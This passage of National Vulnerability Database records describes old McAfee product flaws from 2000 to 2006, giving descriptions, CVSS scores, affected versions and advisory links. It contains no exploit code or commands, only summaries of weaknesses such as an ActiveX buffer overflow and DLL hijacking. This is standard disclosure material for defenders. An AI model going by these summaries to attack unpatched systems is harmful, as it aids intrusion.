"matchCriteriaId": "BECBD40D-ACBD-4E88-B230-ECFE98FD9F5D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:mcafee:security_center:6.0.23:*:*:*:*:*:*:*",
"matchCriteriaId": "A82098C7-30FE-464E-891F-868A0209D9DB",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:mcafee:spamkiller:5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "0652B16C-7D9A-4743-AB54-6F205CA1E76D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:mcafee:spamkiller:6.0:*:*:*:*:*:*:*",
"matchCriteriaId": "6CBC8F91-2534-4DAC-BDE3-AE49E19A6A8E",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:mcafee:spamkiller:7.0:*:*:*:*:*:*:*",
"matchCriteriaId": "5B33F2AC-4BBE-4DE0-A61E-378972011BB0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:mcafee:virusscan:2004:*:*:*:*:*:*:*",
"matchCriteriaId": "4D9B7B07-E3EF-4185-927C-CE308829B9A1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:mcafee:virusscan:2005:*:*:*:*:*:*:*",
"matchCriteriaId": "F58D6A2F-AC08-4C1D-9ABF-4D675A1E87AC",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:mcafee:virusscan:2006:*:*:*:*:*:*:*",
"matchCriteriaId": "9E96246D-3184-4BBB-8675-9B1CBE0B977C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:mcafee:wireless_home_network_security:2006:*:*:*:*:*:*:*",
"matchCriteriaId": "3B3DC47F-853B-44B0-BD8B-C2EE4530B333",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Buffer overflow in McSubMgr ActiveX control (mcsubmgr.dll) in McAfee Security Center 6.0.23 for Internet Security Suite 2006, Wireless Home Network Security, Personal Firewall Plus, VirusScan, Privacy Service, SpamKiller, AntiSpyware, and QuickClean allows remote user-assisted attackers to execute arbitrary commands via long string parameters, which are later used in vsprintf."
},
{
"lang": "es",
"value": "Desbordamiento de b\u00fafer en control ActiveX McSubMgr (mcsubmgr.dll) en McAfee Security Center 6.0.23 para Internet Security Suite 2006, Wireless Home Network Security, Personal Firewall Plus, VirusScan, Privacy Service, SpamKiller, AntiSpyware, y QuickClean permite a atacantes con la intervenci\u00f3n del usuario ejecutar comandos de su elecci\u00f3n a trav\u00e9s de par\u00e1ametros string, los cuales son posteriormente usados en vsprintf."
}
],
"id": "CVE-2006-3961",
"lastModified": "2024-11-21T00:14:48.890",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": true,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
]
},
"published": "2006-08-01T21:04:00.000",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/21264"
},
{
"source": "cve@mitre.org",
"url": "http://securitytracker.com/id?1016614"
},
{
"source": "cve@mitre.org",
"url": "http://ts.mcafeehelp.com/faq3.asp?docid=407052"
},
{
"source": "cve@mitre.org",
"url": "http://www.eeye.com/html/research/advisories/AD2006807.html"
},
{
"source": "cve@mitre.org",
"url": "http://www.eeye.com/html/research/upcoming/20060719.html"
},
{
"source": "cve@mitre.org",
"tags": [
"US Government Resource"
],
"url": "http://www.kb.cert.org/vuls/id/481212"
},
{
"source": "cve@mitre.org",
"url": "http://www.osvdb.org/27698"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/archive/1/442495/100/100/threaded"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch"
],
"url": "http://www.securityfocus.com/bid/19265"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "http://www.vupen.com/english/advisories/2006/3096"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/21264"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://securitytracker.com/id?1016614"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://ts.mcafeehelp.com/faq3.asp?docid=407052"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.eeye.com/html/research/advisories/AD2006807.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.eeye.com/html/research/upcoming/20060719.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"US Government Resource"
],
"url": "http://www.kb.cert.org/vuls/id/481212"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.osvdb.org/27698"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/archive/1/442495/100/100/threaded"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "http://www.securityfocus.com/bid/19265"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "http://www.vupen.com/english/advisories/2006/3096"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-119"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2004-09-14 04:00
Modified
2024-11-20 23:49
Severity ?
Summary
McAfee VirusScan 4.5.1 does not drop SYSTEM privileges before allowing users to browse for files via the "System Scan" properties of the System Tray applet, which could allow local users to gain privileges.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:mcafee:virusscan:4.5:*:*:*:*:*:*:*",
"matchCriteriaId": "1EE9789B-3A6E-4F30-A85F-7A8B075DFF60",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:mcafee:virusscan:4.5.1:*:*:*:*:*:*:*",
"matchCriteriaId": "F31AAED5-60F4-48F6-9DAF-BCB9FC7023D3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "McAfee VirusScan 4.5.1 does not drop SYSTEM privileges before allowing users to browse for files via the \"System Scan\" properties of the System Tray applet, which could allow local users to gain privileges."
}
],
"id": "CVE-2004-0831",
"lastModified": "2024-11-20T23:49:31.033",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 7.2,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 3.9,
"impactScore": 10.0,
"obtainAllPrivilege": true,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2004-09-14T04:00:00.000",
"references": [
{
"source": "cve@mitre.org",
"url": "http://marc.info/?l=bugtraq\u0026m=109526269429728\u0026w=2"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "http://www.idefense.com/application/poi/display?id=140\u0026type=vulnerabilities"
},
{
"source": "cve@mitre.org",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/17367"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://marc.info/?l=bugtraq\u0026m=109526269429728\u0026w=2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "http://www.idefense.com/application/poi/display?id=140\u0026type=vulnerabilities"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/17367"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2001-01-09 05:00
Modified
2024-11-20 23:34
Severity ?
Summary
The default configuration of McAfee VirusScan 4.5 does not quote the ImagePath variable, which improperly sets the search path and allows local users to place a Trojan horse "common.exe" program in the C:\Program Files directory.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cve@mitre.org | http://archives.neohapsis.com/archives/ntbugtraq/2000-q4/0073.html | Exploit, Patch, Vendor Advisory | |
| cve@mitre.org | http://www.securityfocus.com/bid/1920 | Exploit, Patch, Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://archives.neohapsis.com/archives/ntbugtraq/2000-q4/0073.html | Exploit, Patch, Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.securityfocus.com/bid/1920 | Exploit, Patch, Vendor Advisory |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:mcafee:virusscan:4.5:*:*:*:*:*:*:*",
"matchCriteriaId": "1EE9789B-3A6E-4F30-A85F-7A8B075DFF60",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The default configuration of McAfee VirusScan 4.5 does not quote the ImagePath variable, which improperly sets the search path and allows local users to place a Trojan horse \"common.exe\" program in the C:\\Program Files directory."
}
],
"id": "CVE-2000-1128",
"lastModified": "2024-11-20T23:34:04.500",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.6,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 3.9,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": true,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2001-01-09T05:00:00.000",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Vendor Advisory"
],
"url": "http://archives.neohapsis.com/archives/ntbugtraq/2000-q4/0073.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Vendor Advisory"
],
"url": "http://www.securityfocus.com/bid/1920"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Patch",
"Vendor Advisory"
],
"url": "http://archives.neohapsis.com/archives/ntbugtraq/2000-q4/0073.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Patch",
"Vendor Advisory"
],
"url": "http://www.securityfocus.com/bid/1920"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2002-12-31 05:00
Modified
2024-11-20 23:43
Severity ?
Summary
McAfee VirusScan 4.5.1, when the WebScanX.exe module is enabled, searches for particular DLLs from the user's home directory, even when browsing the local hard drive, which allows local users to run arbitrary code via malicious versions of those DLLs.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:mcafee:virusscan:4.5.1:*:*:*:*:*:*:*",
"matchCriteriaId": "F31AAED5-60F4-48F6-9DAF-BCB9FC7023D3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "McAfee VirusScan 4.5.1, when the WebScanX.exe module is enabled, searches for particular DLLs from the user\u0027s home directory, even when browsing the local hard drive, which allows local users to run arbitrary code via malicious versions of those DLLs."
}
],
"id": "CVE-2002-2282",
"lastModified": "2024-11-20T23:43:18.657",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 6.9,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 3.4,
"impactScore": 10.0,
"obtainAllPrivilege": true,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2002-12-31T05:00:00.000",
"references": [
{
"source": "cve@mitre.org",
"url": "http://archives.neohapsis.com/archives/bugtraq/2002-12/0007.html"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/bid/6288"
},
{
"source": "cve@mitre.org",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/10741"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://archives.neohapsis.com/archives/bugtraq/2002-12/0007.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/bid/6288"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/10741"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2006-10-20 14:07
Modified
2024-11-21 00:19
Severity ?
Summary
McAfee Network Agent (mcnasvc.exe) 1.0.178.0, as used by multiple McAfee products possibly including Internet Security Suite, Personal Firewall Plus, and VirusScan, allows remote attackers to cause a denial of service (agent crash) via a long packet, possibly because of an invalid string position field value. NOTE: some of these details are obtained from third party information.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| mcafee | internet_security_suite | * | |
| mcafee | network_agent | 1.0.178.0 | |
| mcafee | personal_firewall_plus | * | |
| mcafee | virusscan | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:mcafee:internet_security_suite:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E7C68CA8-9525-4FBA-A873-F17524D3F595",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:mcafee:network_agent:1.0.178.0:*:*:*:*:*:*:*",
"matchCriteriaId": "CBB41A7D-90D1-4B5F-9DF5-24908F04B9B3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:mcafee:personal_firewall_plus:*:*:*:*:*:*:*:*",
"matchCriteriaId": "47CA26D8-35B1-458C-A9CA-60B033992520",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:mcafee:virusscan:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3B6140F3-9135-4490-A2A2-F8D0A1FEF8C2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "McAfee Network Agent (mcnasvc.exe) 1.0.178.0, as used by multiple McAfee products possibly including Internet Security Suite, Personal Firewall Plus, and VirusScan, allows remote attackers to cause a denial of service (agent crash) via a long packet, possibly because of an invalid string position field value. NOTE: some of these details are obtained from third party information."
},
{
"lang": "es",
"value": "McAfee Network Agent (mcnasvc.exe) 1.0.178.0, seg\u00fan lo utilizado por m\u00faltiples productos McAfee posiblemente incluyendo Internet Security Suite, Personal Firewall Plus, y VirusScan, permiten a un atacante remoto provocar denegaci\u00f3n de servicio (caida del agente) a trav\u00e9s de un gran paquete, posiblemente a causa de un valor de posici\u00f3n de cadena inv\u00e1lido. NOTA: algunos de los detalles de esta informaci\u00f3n se obtuvieron de terceros."
}
],
"id": "CVE-2006-5417",
"lastModified": "2024-11-21T00:19:09.347",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2006-10-20T14:07:00.000",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/22371"
},
{
"source": "cve@mitre.org",
"url": "http://securitydot.net/xpl/exploits/vulnerabilities/articles/1659/exploit.html"
},
{
"source": "cve@mitre.org",
"url": "http://securityreason.com/securityalert/1750"
},
{
"source": "cve@mitre.org",
"url": "http://securitytracker.com/id?1017057"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/archive/1/448546/100/0/threaded"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/bid/20496"
},
{
"source": "cve@mitre.org",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/29501"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/22371"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://securitydot.net/xpl/exploits/vulnerabilities/articles/1659/exploit.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://securityreason.com/securityalert/1750"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://securitytracker.com/id?1017057"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/archive/1/448546/100/0/threaded"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/bid/20496"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/29501"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2000-06-08 04:00
Modified
2024-11-20 23:32
Severity ?
Summary
Mcafee VirusScan 4.03 does not properly restrict access to the alert text file before it is sent to the Central Alert Server, which allows local users to modify alerts in an arbitrary fashion.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:mcafee:virusscan:4.0.3:*:*:*:*:*:*:*",
"matchCriteriaId": "A562D4A2-1E7E-4A43-8634-B8721DA8A9F8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Mcafee VirusScan 4.03 does not properly restrict access to the alert text file before it is sent to the Central Alert Server, which allows local users to modify alerts in an arbitrary fashion."
}
],
"id": "CVE-2000-0502",
"lastModified": "2024-11-20T23:32:39.097",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 2.1,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 3.9,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2000-06-08T04:00:00.000",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "http://archives.neohapsis.com/archives/bugtraq/2000-06/0038.html"
},
{
"source": "cve@mitre.org",
"url": "http://www.osvdb.org/6287"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "http://www.securityfocus.com/bid/1326"
},
{
"source": "cve@mitre.org",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/4641"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "http://archives.neohapsis.com/archives/bugtraq/2000-06/0038.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.osvdb.org/6287"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "http://www.securityfocus.com/bid/1326"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/4641"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
1999-12-22 05:00
Modified
2024-11-20 23:31
Severity ?
Summary
The default configurations for McAfee Virus Scan and Norton Anti-Virus virus checkers do not check files in the RECYCLED folder that is used by the Windows Recycle Bin utility, which allows attackers to store malicious code without detection.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| mcafee | virusscan | * | |
| symantec | norton_antivirus | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:mcafee:virusscan:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3B6140F3-9135-4490-A2A2-F8D0A1FEF8C2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:symantec:norton_antivirus:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7A58C09D-72A0-48E1-ABF0-49EBECA5D02B",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The default configurations for McAfee Virus Scan and Norton Anti-Virus virus checkers do not check files in the RECYCLED folder that is used by the Windows Recycle Bin utility, which allows attackers to store malicious code without detection."
}
],
"id": "CVE-2000-0119",
"lastModified": "2024-11-20T23:31:45.740",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 7.2,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 3.9,
"impactScore": 10.0,
"obtainAllPrivilege": true,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "1999-12-22T05:00:00.000",
"references": [
{
"source": "cve@mitre.org",
"url": "http://marc.info/?l=bugtraq\u0026m=94936267131123\u0026w=2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://marc.info/?l=bugtraq\u0026m=94936267131123\u0026w=2"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2006-07-13 10:05
Modified
2024-11-21 00:13
Severity ?
Summary
Unknown vulnerability in the Buffer Overflow Protection in McAfee VirusScan Enterprise 8.0.0 allows local users to cause a denial of service (unstable operation) via a long string in the (1) "Process name", (2) "Module name", or (3) "API name" fields.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:mcafee:virusscan:8.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "8AC64100-46C1-4F3E-9D9D-84E7BAB0B20D",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Unknown vulnerability in the Buffer Overflow Protection in McAfee VirusScan Enterprise 8.0.0 allows local users to cause a denial of service (unstable operation) via a long string in the (1) \"Process name\", (2) \"Module name\", or (3) \"API name\" fields."
},
{
"lang": "es",
"value": "Vulnerabilidad desconocida en la protecci\u00f3n de desbordamiento de b\u00fafer en McAfee VirusScan Enterprise 8.0.0 permite a usuarios locales provocar denegaci\u00f3n de servicio (operaci\u00f3n inestable) a trav\u00e9s de una cadena larga en los campos (1) \"Process name\", (2) \"Module name\", o (3) \"API name\"."
}
],
"id": "CVE-2006-3575",
"lastModified": "2024-11-21T00:13:55.917",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 2.1,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 3.9,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2006-07-13T10:05:00.000",
"references": [
{
"source": "cve@mitre.org",
"url": "http://securityreason.com/securityalert/1216"
},
{
"source": "cve@mitre.org",
"url": "http://securitytracker.com/id?1016450"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/archive/1/439430/100/0/threaded"
},
{
"source": "cve@mitre.org",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/27625"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://securityreason.com/securityalert/1216"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://securitytracker.com/id?1016450"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/archive/1/439430/100/0/threaded"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/27625"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}